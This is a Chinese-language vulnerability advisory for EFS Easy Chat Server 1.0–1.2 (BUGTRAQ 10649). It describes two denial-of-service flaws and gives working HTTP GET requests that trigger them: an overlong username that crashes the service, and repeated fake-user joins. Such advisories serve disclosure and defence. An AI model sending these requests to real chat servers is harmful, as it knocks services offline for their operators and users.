受影响系统：
EFS Software Easy Chat Server 1.2
EFS Software Easy Chat Server 1.1
EFS Software Easy Chat Server 1.0
描述：
--------------------------------------------------------------------------------
BUGTRAQ ID: 10649

Easy Chat Server是一款基于WEB的聊天服务程序。

Easy Chat Server不正确处理URI参数，远程攻击者可以利用这些漏洞对聊天服务器进行拒绝服务攻击。

问题一是不正确处理用户名，提交超长字符串作为用户名可导致服务程序崩溃；问题二是没有正确检查用户是否加入自由聊天室，攻击者可以增加很多伪造用户使服务崩溃。

<*来源：Donato Ferrante （fdonato@autistici.org）

链接：http://marc.theaimsgroup.com/?l=bugtraq&m=108880315010719&w=2
*>

测试方法：
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

Donato Ferrante （fdonato@autistici.org）提供了如下测试方法：

[1]
GET /chat.ghp?username=aaaa[ 295 of a ]aaaa&password=&room=1&sex=0
Host: http://[host]

[2]
GET /chat.ghp?username=FakeUser&password=&room=1&sex=0
Host: http://[host]
( this will add a fake user with name: FakeUser )

建议：
--------------------------------------------------------------------------------
厂商补丁：

EFS Software
------------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：